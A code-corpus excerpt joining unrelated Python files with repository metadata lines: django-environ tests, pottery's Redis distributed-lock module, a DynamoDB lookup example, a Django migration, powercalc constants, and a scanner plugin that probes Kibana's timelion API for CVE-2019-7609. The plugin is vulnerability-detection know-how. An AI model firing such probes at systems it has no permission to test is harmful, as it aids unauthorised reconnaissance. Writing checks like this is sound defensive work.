url = 'smtps://user@domain.com:password@smtp.example.com:587'
url = Env.email_url_config(url)
self.assertEqual(url['EMAIL_BACKEND'], 'django.core.mail.backends.smtp.EmailBackend')
self.assertEqual(url['EMAIL_HOST'], 'smtp.example.com')
self.assertEqual(url['EMAIL_HOST_PASSWORD'], 'password')
self.assertEqual(url['EMAIL_HOST_USER'], 'user@domain.com')
self.assertEqual(url['EMAIL_PORT'], 587)
self.assertEqual(url['EMAIL_USE_TLS'], True)
class PathTests(unittest.TestCase):
def test_path_class(self):
root = Path(__file__, '..', is_file=True)
root_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../'))
self.assertEqual(root(), root_path)
self.assertEqual(root.__root__, root_path)
web = root.path('public')
self.assertEqual(web(), os.path.join(root_path, 'public'))
self.assertEqual(web('css'), os.path.join(root_path, 'public', 'css'))
def test_required_path(self):
self.assertRaises(ImproperlyConfigured, Path, '/not/existing/path/', required=True)
self.assertRaises(ImproperlyConfigured, Path(__file__), 'not_existing_path', required=True)
def test_comparison(self):
self.assertTrue(Path('/home') in Path('/'))
self.assertTrue(Path('/home') not in Path('/other/dir'))
self.assertTrue(Path('/home') == Path('/home'))
self.assertTrue(Path('/home') != Path('/home/dev'))
self.assertEqual(Path('/home/foo/').rfind('/'), str(Path('/home/foo')).rfind('/'))
self.assertEqual(Path('/home/foo/').find('/home'), str(Path('/home/foo/')).find('/home'))
self.assertEqual(Path('/home/foo/')[1], str(Path('/home/foo/'))[1])
self.assertEqual(Path('/home/foo/').__fspath__(), str(Path('/home/foo/')))
self.assertEqual(~Path('/home'), Path('/'))
self.assertEqual(Path('/') + 'home', Path('/home'))
self.assertEqual(Path('/') + '/home/public', Path('/home/public'))
self.assertEqual(Path('/home/dev/public') - 2, Path('/home'))
self.assertEqual(Path('/home/dev/public') - 'public', Path('/home/dev'))
self.assertRaises(TypeError, lambda _: Path('/home/dev/') - 'not int')
def load_suite():
test_suite = unittest.TestSuite()
cases = [
EnvTests, FileEnvTests, SubClassTests, SchemaEnvTests, PathTests,
DatabaseTestSuite, CacheTestSuite, EmailTests, SearchTestSuite
]
for case in cases:
test_suite.addTest(unittest.makeSuite(case))
return test_suite
if __name__ == "__main__":
try:
if sys.argv[1] == '-o':
for key, value in BaseTests.generateData().items():
print("{}={}".format(key, value))
sys.exit()
except IndexError:
pass
unittest.TextTestRunner().run(load_suite())
| 42.515306
| 124
| 0.644336
|
8097626df0018611c330c7e639defdf02c5cce45
| 26,863
|
py
|
Python
|
pottery/redlock.py
|
brainix/pottery
|
53897a8275400dc6a0c30b12fda9b57ad3037dbb
|
[
"Apache-2.0"
] | 625
|
2015-06-11T06:53:37.000Z
|
2022-03-29T16:30:08.000Z
|
pottery/redlock.py
|
brainix/pottery
|
53897a8275400dc6a0c30b12fda9b57ad3037dbb
|
[
"Apache-2.0"
] | 612
|
2015-06-12T05:39:32.000Z
|
2022-03-16T00:06:58.000Z
|
pottery/redlock.py
|
brainix/pottery
|
53897a8275400dc6a0c30b12fda9b57ad3037dbb
|
[
"Apache-2.0"
] | 30
|
2017-01-29T12:00:39.000Z
|
2022-03-13T11:39:49.000Z
|
# --------------------------------------------------------------------------- #
# redlock.py #
# #
# Copyright © 2015-2021, Rajiv Bakulesh Shah, original author. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at: #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# --------------------------------------------------------------------------- #
'''Distributed Redis-powered lock.
This algorithm safely and reliably provides a mutually-exclusive locking
primitive to protect a resource shared across threads, processes, and even
machines, without a single point of failure.
Rationale and algorithm description:
http://redis.io/topics/distlock
Reference implementations:
https://github.com/antirez/redlock-rb
https://github.com/SPSCommerce/redlock-py
Lua scripting:
https://github.com/andymccurdy/redis-py#lua-scripting
'''
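# Sketch of the acquisition flow implemented below (see __acquire_masters()):
#   1. Generate a random UUID as the lock value and concurrently try
#      SET key uuid NX PX=<auto_release_time> on every Redis master.
#   2. The lock is held only if a quorum (strict majority) of masters accepted
#      the SET and the remaining validity time -- TTL minus elapsed time minus
#      an allowance for clock drift -- is still positive; otherwise any partial
#      locks are released and acquire() retries (when blocking).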
import concurrent.futures
import contextlib
import functools
import logging
import math
import random
import time
import uuid
from types import TracebackType
from typing import Any
from typing import Callable
from typing import ClassVar
from typing import Iterable
from typing import Optional
from typing import Tuple
from typing import Type
from typing import cast
from typing import overload
from redis import Redis
from redis import RedisError
from redis.client import Script
from typing_extensions import Final
from typing_extensions import Literal
from .annotations import F
from .base import Primitive
from .exceptions import ExtendUnlockedLock
from .exceptions import QuorumNotAchieved
from .exceptions import ReleaseUnlockedLock
from .exceptions import TooManyExtensions
from .executor import BailOutExecutor
from .timer import ContextTimer
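# Durations in this module are expressed in milliseconds (they are passed to
# Redis SET ... PX / PEXPIRE): the default auto-release time below is
# 10 * 1000 ms, i.e. the 10 second timeout described in the Redlock docstring.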
AUTO_RELEASE_TIME: Final[int] = 10 * 1000
_logger: Final[logging.Logger] = logging.getLogger('pottery')
class _Scripts:
'''Parent class to define/register Lua scripts for Redis.
Note that we only have to register these Lua scripts once -- so we do it on
the first instantiation of Redlock.
'''
__slots__: Tuple[str, ...] = tuple()
_acquired_script: ClassVar[Optional[Script]] = None
_extend_script: ClassVar[Optional[Script]] = None
_release_script: ClassVar[Optional[Script]] = None
def __init__(self,
*,
key: str,
masters: Iterable[Redis] = frozenset(),
raise_on_redis_errors: bool = False,
) -> None:
super().__init__( # type: ignore
key=key,
masters=masters,
raise_on_redis_errors=raise_on_redis_errors,
)
self.__register_acquired_script()
self.__register_extend_script()
self.__register_release_script()
# Preserve the Open-Closed Principle with name mangling.
# https://youtu.be/miGolgp9xq8?t=2086
# https://stackoverflow.com/a/38534939
def __register_acquired_script(self) -> None:
if self._acquired_script is None:
class_name = self.__class__.__qualname__
_logger.info('Registering %s._acquired_script', class_name)
master = next(iter(self.masters)) # type: ignore
self.__class__._acquired_script = master.register_script('''
if redis.call('get', KEYS[1]) == ARGV[1] then
local pttl = redis.call('pttl', KEYS[1])
return (pttl > 0) and pttl or 0
else
return 0
end
''')
def __register_extend_script(self) -> None:
if self._extend_script is None:
class_name = self.__class__.__qualname__
_logger.info('Registering %s._extend_script', class_name)
master = next(iter(self.masters)) # type: ignore
self.__class__._extend_script = master.register_script('''
if redis.call('get', KEYS[1]) == ARGV[1] then
return redis.call('pexpire', KEYS[1], ARGV[2])
else
return 0
end
''')
def __register_release_script(self) -> None:
if self._release_script is None:
class_name = self.__class__.__qualname__
_logger.info('Registering %s._release_script', class_name)
master = next(iter(self.masters)) # type: ignore
self.__class__._release_script = master.register_script('''
if redis.call('get', KEYS[1]) == ARGV[1] then
return redis.call('del', KEYS[1])
else
return 0
end
''')
class Redlock(_Scripts, Primitive):
'''Distributed Redis-powered lock.
This algorithm safely and reliably provides a mutually-exclusive locking
primitive to protect a resource shared across threads, processes, and even
machines, without a single point of failure.
Rationale and algorithm description:
http://redis.io/topics/distlock
Usage:
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock = Redlock(key='printer', masters={redis})
>>> bool(printer_lock.locked())
False
>>> printer_lock.acquire()
True
>>> bool(printer_lock.locked())
True
>>> # Critical section - print stuff here.
>>> printer_lock.release()
>>> bool(printer_lock.locked())
False
Redlocks time out (by default, after 10 seconds). You should take care to
ensure that your critical section completes well within the timeout. The
reasons that Redlocks time out are to preserve "liveness"
(http://redis.io/topics/distlock#liveness-arguments) and to avoid deadlocks
(in the event that a process dies inside a critical section before it
releases its lock).
>>> printer_lock.acquire()
True
>>> bool(printer_lock.locked())
True
>>> # Critical section - print stuff here.
>>> time.sleep(10)
>>> bool(printer_lock.locked())
False
If 10 seconds isn't enough to complete executing your critical section,
then you can specify your own timeout:
>>> printer_lock = Redlock(key='printer', masters={redis}, auto_release_time=15*1000)
>>> printer_lock.acquire()
True
>>> bool(printer_lock.locked())
True
>>> # Critical section - print stuff here.
>>> time.sleep(10)
>>> bool(printer_lock.locked())
True
>>> time.sleep(5)
>>> bool(printer_lock.locked())
False
You can use a Redlock as a context manager:
>>> states = []
>>> with Redlock(key='printer', masters={redis}) as printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
>>> states = []
>>> with printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
'''
__slots__ = (
'auto_release_time',
'num_extensions',
'context_manager_blocking',
'context_manager_timeout',
'_uuid',
'_extension_num',
)
KEY_PREFIX: ClassVar[str] = 'redlock'
CLOCK_DRIFT_FACTOR: ClassVar[float] = 0.01
RETRY_DELAY: ClassVar[int] = 200
NUM_EXTENSIONS: ClassVar[int] = 3
def __init__(self,
*,
key: str,
masters: Iterable[Redis] = frozenset(),
raise_on_redis_errors: bool = False,
auto_release_time: int = AUTO_RELEASE_TIME,
num_extensions: int = NUM_EXTENSIONS,
context_manager_blocking: bool = True,
context_manager_timeout: float = -1,
) -> None:
if not context_manager_blocking and context_manager_timeout != -1:
raise ValueError("can't specify a timeout for a non-blocking call")
super().__init__(
key=key,
masters=masters,
raise_on_redis_errors=raise_on_redis_errors,
)
self.auto_release_time = auto_release_time
self.num_extensions = num_extensions
self.context_manager_blocking = context_manager_blocking
self.context_manager_timeout = context_manager_timeout
self._uuid = ''
self._extension_num = 0
def __acquire_master(self, master: Redis) -> bool:
acquired = master.set(
self.key,
self._uuid,
px=self.auto_release_time,
nx=True,
)
return bool(acquired)
def __acquired_master(self, master: Redis) -> int:
if self._uuid:
ttl: int = cast(Script, self._acquired_script)(
keys=(self.key,),
args=(self._uuid,),
client=master,
)
else:
ttl = 0
return ttl
def __extend_master(self, master: Redis) -> bool:
extended = cast(Script, self._extend_script)(
keys=(self.key,),
args=(self._uuid, self.auto_release_time),
client=master,
)
return bool(extended)
def __release_master(self, master: Redis) -> bool:
released = cast(Script, self._release_script)(
keys=(self.key,),
args=(self._uuid,),
client=master,
)
return bool(released)
def __drift(self) -> float:
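        # Following the Redlock reference implementations: budget roughly 1% of
        # the TTL (CLOCK_DRIFT_FACTOR) for relative clock drift between masters,
        # plus 2 ms for Redis' key expiry precision.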
return self.auto_release_time * self.CLOCK_DRIFT_FACTOR + 2
def __acquire_masters(self,
*,
raise_on_redis_errors: Optional[bool] = None,
) -> bool:
self._uuid = str(uuid.uuid4())
self._extension_num = 0
with ContextTimer() as timer, BailOutExecutor() as executor:
futures = set()
for master in self.masters:
future = executor.submit(self.__acquire_master, master)
futures.add(future)
num_masters_acquired, redis_errors = 0, []
for future in concurrent.futures.as_completed(futures):
try:
num_masters_acquired += future.result()
except RedisError as error:
redis_errors.append(error)
_logger.exception(
'%s.__acquire_masters() caught %s',
self.__class__.__name__,
error.__class__.__name__,
)
else:
if num_masters_acquired > len(self.masters) // 2:
validity_time = self.auto_release_time
validity_time -= round(self.__drift())
validity_time -= timer.elapsed()
if validity_time > 0: # pragma: no cover
return True
with contextlib.suppress(ReleaseUnlockedLock):
self.__release(raise_on_redis_errors=False)
self._check_enough_masters_up(raise_on_redis_errors, redis_errors)
return False
def acquire(self,
*,
blocking: bool = True,
timeout: float = -1,
raise_on_redis_errors: Optional[bool] = None,
) -> bool:
'''Lock the lock.
If blocking is True and timeout is -1, then wait for as long as
necessary to acquire the lock. Return True.
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock_1 = Redlock(key='printer', masters={redis})
>>> printer_lock_1.acquire()
True
>>> timer = ContextTimer()
>>> timer.start()
>>> printer_lock_2 = Redlock(key='printer', masters={redis})
>>> printer_lock_2.acquire()
True
>>> 10 * 1000 < timer.elapsed() < 11 * 1000
True
>>> printer_lock_2.release()
If blocking is True and timeout is not -1, then wait for up to timeout
seconds to acquire the lock. Return True if the lock was acquired;
False if it wasn't.
>>> printer_lock_1.acquire()
True
>>> printer_lock_2.acquire(timeout=15)
True
>>> printer_lock_2.release()
>>> printer_lock_1.acquire()
True
>>> printer_lock_2.acquire(timeout=1)
False
>>> printer_lock_1.release()
If blocking is False and timeout is -1, then try just once right now to
acquire the lock. Return True if the lock was acquired; False if it
wasn't.
>>> printer_lock_1.acquire()
True
>>> printer_lock_2.acquire(blocking=False)
False
>>> printer_lock_1.release()
'''
acquire_masters = functools.partial(
self.__acquire_masters,
raise_on_redis_errors=raise_on_redis_errors,
)
def log_time_enqueued(timer: ContextTimer, acquired: bool) -> None:
key_suffix = self.key.split(':', maxsplit=1)[1]
time_enqueued = math.ceil(timer.elapsed())
_logger.info(
'source=pottery sample#redlock.enqueued.%s=%dms sample#redlock.acquired.%s=%d',
key_suffix,
time_enqueued,
key_suffix,
acquired,
)
if blocking:
enqueued = False
with ContextTimer() as timer:
while timeout == -1 or timer.elapsed() / 1000 < timeout:
if acquire_masters():
if enqueued:
log_time_enqueued(timer, True)
return True
enqueued = True
time.sleep(random.uniform(0, self.RETRY_DELAY/1000))
if enqueued:
log_time_enqueued(timer, False)
return False
if timeout == -1:
return acquire_masters()
raise ValueError("can't specify a timeout for a non-blocking call")
__acquire = acquire
def locked(self, *, raise_on_redis_errors: Optional[bool] = None) -> int:
'''How much longer we'll hold the lock (unless we extend or release it).
If we don't currently hold the lock, then this method returns 0.
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock_1 = Redlock(key='printer', masters={redis})
>>> printer_lock_1.locked()
0
>>> printer_lock_2 = Redlock(key='printer', masters={redis})
>>> printer_lock_2.acquire()
True
>>> printer_lock_1.locked()
0
>>> printer_lock_2.release()
If we do currently hold the lock, then this method returns the current
lease's Time To Live (TTL) in ms.
>>> printer_lock_1.acquire()
True
>>> 9 * 1000 < printer_lock_1.locked() < 10 * 1000
True
>>> printer_lock_1.release()
'''
with ContextTimer() as timer, BailOutExecutor() as executor:
futures = set()
for master in self.masters:
future = executor.submit(self.__acquired_master, master)
futures.add(future)
ttls, redis_errors = [], []
for future in concurrent.futures.as_completed(futures):
try:
ttl = future.result()
except RedisError as error:
redis_errors.append(error)
_logger.exception(
'%s.locked() caught %s',
self.__class__.__name__,
error.__class__.__name__,
)
else:
if ttl:
ttls.append(ttl)
if len(ttls) > len(self.masters) // 2: # pragma: no cover
validity_time = min(ttls)
validity_time -= round(self.__drift())
validity_time -= timer.elapsed()
return max(validity_time, 0)
self._check_enough_masters_up(raise_on_redis_errors, redis_errors)
return 0
__locked = locked
def extend(self, *, raise_on_redis_errors: Optional[bool] = None) -> None:
'''Extend our hold on the lock (if we currently hold it).
Usage:
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock = Redlock(key='printer', masters={redis})
>>> printer_lock.acquire()
True
>>> 9 * 1000 < printer_lock.locked() < 10 * 1000
True
>>> time.sleep(1)
>>> 8 * 1000 < printer_lock.locked() < 9 * 1000
True
>>> printer_lock.extend()
>>> 9 * 1000 < printer_lock.locked() < 10 * 1000
True
>>> printer_lock.release()
'''
if self._extension_num >= self.num_extensions:
raise TooManyExtensions(self.key, self.masters)
with BailOutExecutor() as executor:
futures = set()
for master in self.masters:
future = executor.submit(self.__extend_master, master)
futures.add(future)
num_masters_extended, redis_errors = 0, []
for future in concurrent.futures.as_completed(futures):
try:
num_masters_extended += future.result()
except RedisError as error:
redis_errors.append(error)
_logger.exception(
'%s.extend() caught %s',
self.__class__.__name__,
error.__class__.__name__,
)
else:
if num_masters_extended > len(self.masters) // 2:
self._extension_num += 1
return
self._check_enough_masters_up(raise_on_redis_errors, redis_errors)
raise ExtendUnlockedLock(
self.key,
self.masters,
redis_errors=redis_errors,
)
def release(self, *, raise_on_redis_errors: Optional[bool] = None) -> None:
'''Unlock the lock.
Usage:
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> printer_lock = Redlock(key='printer', masters={redis})
>>> bool(printer_lock.locked())
False
>>> printer_lock.acquire()
True
>>> bool(printer_lock.locked())
True
>>> printer_lock.release()
>>> bool(printer_lock.locked())
False
'''
with BailOutExecutor() as executor:
futures = set()
for master in self.masters:
future = executor.submit(self.__release_master, master)
futures.add(future)
num_masters_released, redis_errors = 0, []
for future in concurrent.futures.as_completed(futures):
try:
num_masters_released += future.result()
except RedisError as error:
redis_errors.append(error)
_logger.exception(
'%s.release() caught %s',
self.__class__.__name__,
error.__class__.__name__,
)
else:
if num_masters_released > len(self.masters) // 2:
return
self._check_enough_masters_up(raise_on_redis_errors, redis_errors)
raise ReleaseUnlockedLock(
self.key,
self.masters,
redis_errors=redis_errors,
)
__release = release
def __enter__(self) -> 'Redlock':
'''You can use a Redlock as a context manager.
Usage:
>>> states = []
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> with Redlock(key='printer', masters={redis}) as printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
>>> states = []
>>> with printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
'''
acquired = self.__acquire(
blocking=self.context_manager_blocking,
timeout=self.context_manager_timeout,
)
if acquired:
return self
raise QuorumNotAchieved(self.key, self.masters)
@overload
def __exit__(self,
exc_type: None,
exc_value: None,
exc_traceback: None,
) -> Literal[False]:
raise NotImplementedError
@overload
def __exit__(self,
exc_type: Type[BaseException],
exc_value: BaseException,
exc_traceback: TracebackType,
) -> Literal[False]:
raise NotImplementedError
def __exit__(self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> Literal[False]:
'''You can use a Redlock as a context manager.
Usage:
>>> states = []
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> with Redlock(key='printer', masters={redis}) as printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
>>> states = []
>>> with printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
'''
self.__release()
return False
def __repr__(self) -> str:
return f'<{self.__class__.__name__} key={self.key}>'
def synchronize(*,
key: str,
masters: Iterable[Redis] = frozenset(),
raise_on_redis_errors: bool = False,
auto_release_time: int = AUTO_RELEASE_TIME,
blocking: bool = True,
timeout: float = -1,
) -> Callable[[F], F]:
'''Decorator to synchronize a function's execution across threads.
synchronize() is a decorator that allows only one thread to execute a
function at a time. Under the hood, synchronize() uses a Redlock. See
help(Redlock) for more details.
Usage:
>>> @synchronize(key='synchronized-func', auto_release_time=1500)
... def func():
... # Only one thread can execute this function at a time.
... return True
...
>>> func()
True
'''
RedlockFactory = functools.partial(
Redlock,
key=key,
masters=masters,
raise_on_redis_errors=raise_on_redis_errors,
auto_release_time=auto_release_time,
context_manager_blocking=blocking,
context_manager_timeout=timeout,
)
def decorator(func: F) -> F:
@functools.wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
redlock = RedlockFactory()
waiting_timer, holding_timer = ContextTimer(), ContextTimer()
try:
waiting_timer.start()
with redlock:
waiting_timer.stop()
holding_timer.start()
return_value = func(*args, **kwargs)
holding_timer.stop()
finally:
_log_synchronize(func, redlock, waiting_timer, holding_timer)
return return_value
return cast(F, wrapper)
return decorator
def _log_synchronize(func: F,
redlock: Redlock,
waiting_timer: ContextTimer,
holding_timer: ContextTimer,
) -> None:
try:
_logger.info(
'%s() waited for %s for %d ms; held for %d ms',
func.__qualname__,
redlock.key,
waiting_timer.elapsed(),
holding_timer.elapsed(),
)
except RuntimeError: # pragma: no cover
# holding_timer.elapsed() threw a RuntimeError, which means that
# holding_timer never started, which means that we never acquired the
# lock / entered the critical section.
_logger.info(
'%s() waited for %s for %d ms; never acquired lock',
func.__qualname__,
redlock.key,
waiting_timer.elapsed(),
)
if __name__ == '__main__':
# Run the doctests in this module with:
# $ source venv/bin/activate
# $ python3 -m pottery.redlock
# $ deactivate
with contextlib.suppress(ImportError):
from tests.base import run_doctests # type: ignore
run_doctests()
| 35.533069
| 95
| 0.543126
|
bb2c9c4cb8053b03187c6144b05bb06ef20b1282
| 889
|
py
|
Python
|
DynamoDB/MoviesItemOps02.py
|
Kunal-Karnik/content-lambda-boto3
|
0bde85c1bc036c8000505ff9969be5f7666a12c2
|
[
"MIT"
] | null | null | null |
DynamoDB/MoviesItemOps02.py
|
Kunal-Karnik/content-lambda-boto3
|
0bde85c1bc036c8000505ff9969be5f7666a12c2
|
[
"MIT"
] | null | null | null |
DynamoDB/MoviesItemOps02.py
|
Kunal-Karnik/content-lambda-boto3
|
0bde85c1bc036c8000505ff9969be5f7666a12c2
|
[
"MIT"
] | null | null | null |
import decimal
import json
import boto3
from boto3.dynamodb.conditions import Attr, Key
from botocore.exceptions import ClientError
class DecimalEncoder(json.JSONEncoder):
'''Helper class to convert a DynamoDB item to JSON'''
def default(self, o):
if isinstance(o, decimal.Decimal):
if o % 1 > 0:
return float(o)
else:
return int(o)
return super(DecimalEncoder, self).default(o)
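# Illustrative usage: DynamoDB returns numbers as decimal.Decimal, so a plain
# json.dumps() would raise TypeError, whereas
# json.dumps({'rating': decimal.Decimal('3.5')}, cls=DecimalEncoder) == '{"rating": 3.5}'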
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table('Movies')
title = "The Big New Movie"
year = 2015
try:
response = table.get_item(
Key={
'year': year,
'title': title
}
)
except ClientError as e:
print(e.response['Error']['Message'])
else:
item = response['Item']
print("GetItem succeeded:")
print(json.dumps(item, indent=4, cls=DecimalEncoder))
| 21.682927
| 57
| 0.618673
|
0ad4c7eb478daa3e4754cf2533e374f319e53646
| 3,255
|
py
|
Python
|
python/app/plugins/http/Kibana/CVE_2019_7609.py
|
taomujian/linbing
|
fe772a58f41e3b046b51a866bdb7e4655abaf51a
|
[
"MIT"
] | 351
|
2020-02-26T05:23:26.000Z
|
2022-03-26T12:39:19.000Z
|
python/app/plugins/http/Kibana/CVE_2019_7609.py
|
taomujian/linbing
|
fe772a58f41e3b046b51a866bdb7e4655abaf51a
|
[
"MIT"
] | 15
|
2020-03-26T07:31:49.000Z
|
2022-03-09T02:12:17.000Z
|
python/app/plugins/http/Kibana/CVE_2019_7609.py
|
taomujian/linbing
|
fe772a58f41e3b046b51a866bdb7e4655abaf51a
|
[
"MIT"
] | 99
|
2020-02-28T07:30:46.000Z
|
2022-03-16T16:41:09.000Z
|
#!/usr/bin/env python3
import re
import time
import random
import binascii
from app.lib.utils.request import request
from app.lib.utils.common import get_capta, get_useragent
class CVE_2019_7609_BaseVerify:
def __init__(self, url):
self.info = {
            'name': 'CVE-2019-7609 vulnerability',
            'description': 'CVE-2019-7609 allows arbitrary command execution (and a reverse shell); affected versions: Kibana < 5.6.15, < 6.6.1',
'date': '2019-02-07',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
self.version = '9.9.9'
self.capta = get_capta()
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
def get_kibana_version(self):
"""
        Get the Kibana version number
:param:
:return:
"""
headers = {
'Referer': self.url,
'User-Agent': get_useragent()
}
r = request.get(self.url+"/app/kibana", headers = headers)
patterns = ['"version":"(.*?)",', '"version":"(.*?)",']
for pattern in patterns:
match = re.findall(pattern, r.text)
if match:
self.version = match[0]
def version_compare(self, standard_version, compare_version):
"""
        Check whether the target Kibana version falls in the affected range
        :param str standard_version: the reference (threshold) version
        :param str compare_version: the version to compare against it
        :return bool True or False: the comparison result
"""
sc = standard_version.split(".")
cc = compare_version.split(".")
if len(sc) == 3 and len(cc) == 3:
if sc[0].isdigit() and sc[1].isdigit() and sc[2].isdigit() and cc[0].isdigit() and cc[1].isdigit() and cc[2].isdigit():
sc_value = 100 * int(sc[0]) + 10 * int(sc[1]) + int(sc[2])
cc_value = 100 * int(cc[0]) + 10 * int(cc[1]) + int(cc[2])
if sc_value > cc_value:
return True
return False
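    # Note on the weighting above: "6.6.1" -> 100*6 + 10*6 + 1 = 661 and
    # "6.5.4" -> 654, so version_compare("6.6.1", "6.5.4") is True. The scheme
    # misorders components >= 10 (e.g. "5.6.15" scores 575, above "5.7.0" at 570).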
def check(self):
"""
        Check whether the target is vulnerable
        :param:
        :return bool True or False: whether the vulnerability exists
"""
self.get_kibana_version()
if self.version == '9.9.9' or not self.version_compare("6.6.1", self.version):
return False
headers = {
'Content-Type': 'application/json;charset=utf-8',
'Referer': self.url,
'kbn-version': self.version,
'User-Agent': get_useragent()
}
data = '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}'
try:
r = request.post(self.url + "/api/timelion/run", data = data, headers = headers)
if r.status_code == 200 and 'application/json' in r.headers.get('content-type', '') and '"seriesList"' in r.text:
print("存在CVE-2019-7609漏洞")
return True
else:
print("不存在CVE-2019-7609漏洞")
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
CVE_2019_7609 = CVE_2019_7609_BaseVerify('http://192.168.30.242:5601')
CVE_2019_7609.check()
| 31.601942
| 133
| 0.523195
|
3f605e0167fa7674531f5baa4bab8a1a92cf35f9
| 698
|
py
|
Python
|
devilry/devilry_group/migrations/0010_auto_20160107_1106.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | 29
|
2015-01-18T22:56:23.000Z
|
2020-11-10T21:28:27.000Z
|
devilry/devilry_group/migrations/0010_auto_20160107_1106.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | 786
|
2015-01-06T16:10:18.000Z
|
2022-03-16T11:10:50.000Z
|
devilry/devilry_group/migrations/0010_auto_20160107_1106.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | 15
|
2015-04-06T06:18:43.000Z
|
2021-02-24T12:28:30.000Z
|
# -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('devilry_group', '0009_auto_20160107_1100'),
]
operations = [
migrations.RemoveField(
model_name='groupcomment',
name='part_of_grading',
),
migrations.RemoveField(
model_name='groupcomment',
name='visibility',
),
migrations.RemoveField(
model_name='imageannotationcomment',
name='part_of_grading',
),
migrations.RemoveField(
model_name='imageannotationcomment',
name='visibility',
),
]
| 22.516129
| 53
| 0.563037
|
e62ed4a3b12dc58192b5c34c93e9ad3810332e6a
| 3,896
|
py
|
Python
|
custom_components/powercalc/const.py
|
alanpaone/homeassistant-powercalc
|
dbf67b730a72b8ddc3e60659089368c112b62dd3
|
[
"MIT"
] | null | null | null |
custom_components/powercalc/const.py
|
alanpaone/homeassistant-powercalc
|
dbf67b730a72b8ddc3e60659089368c112b62dd3
|
[
"MIT"
] | null | null | null |
custom_components/powercalc/const.py
|
alanpaone/homeassistant-powercalc
|
dbf67b730a72b8ddc3e60659089368c112b62dd3
|
[
"MIT"
] | null | null | null |
"""The Powercalc constants."""
DOMAIN = "powercalc"
DOMAIN_CONFIG = "config"
DATA_CALCULATOR_FACTORY = "calculator_factory"
DATA_CONFIGURED_ENTITIES = "configured_entities"
DATA_DISCOVERED_ENTITIES = "discovered_entities"
DUMMY_ENTITY_ID = "dummy"
CONF_AREA = "area"
CONF_CALIBRATE = "calibrate"
CONF_CREATE_GROUP = "create_group"
CONF_CREATE_ENERGY_SENSOR = "create_energy_sensor"
CONF_CREATE_ENERGY_SENSORS = "create_energy_sensors"
CONF_CREATE_UTILITY_METERS = "create_utility_meters"
CONF_DAILY_FIXED_ENERGY = "daily_fixed_energy"
CONF_ENABLE_AUTODISCOVERY = "enable_autodiscovery"
CONF_ENERGY_INTEGRATION_METHOD = "energy_integration_method"
CONF_ENERGY_SENSOR_NAMING = "energy_sensor_naming"
CONF_FIXED = "fixed"
CONF_GROUP = "group"
CONF_INCLUDE = "include"
CONF_LINEAR = "linear"
CONF_MODEL = "model"
CONF_MANUFACTURER = "manufacturer"
CONF_MODE = "mode"
CONF_MULTIPLY_FACTOR = "multiply_factor"
CONF_MULTIPLY_FACTOR_STANDBY = "multiply_factor_standby"
CONF_MIN_WATT = "min_watt"
CONF_MAX_WATT = "max_watt"
CONF_POWER_FACTOR = "power_factor"
CONF_POWER_SENSOR_NAMING = "power_sensor_naming"
CONF_POWER = "power"
CONF_POWER_SENSOR_ID = "power_sensor_id"
CONF_MIN_POWER = "min_power"
CONF_MAX_POWER = "max_power"
CONF_ON_TIME = "on_time"
CONF_TEMPLATE = "template"
CONF_UPDATE_FREQUENCY = "update_frequency"
CONF_VALUE = "value"
CONF_VOLTAGE = "voltage"
CONF_WATT = "watt"
CONF_WLED = "wled"
CONF_STATES_POWER = "states_power"
CONF_STANDBY_POWER = "standby_power"
CONF_DISABLE_STANDBY_POWER = "disable_standby_power"
CONF_CUSTOM_MODEL_DIRECTORY = "custom_model_directory"
CONF_UTILITY_METER_OFFSET = "utility_meter_offset"
CONF_UTILITY_METER_TYPES = "utility_meter_types"
DISCOVERY_SOURCE_ENTITY = "source_entity"
DISCOVERY_LIGHT_MODEL = "light_model"
ATTR_CALCULATION_MODE = "calculation_mode"
ATTR_ENTITIES = "entities"
ATTR_INTEGRATION = "integration"
ATTR_IS_GROUP = "is_group"
ATTR_SOURCE_ENTITY = "source_entity"
ATTR_SOURCE_DOMAIN = "source_domain"
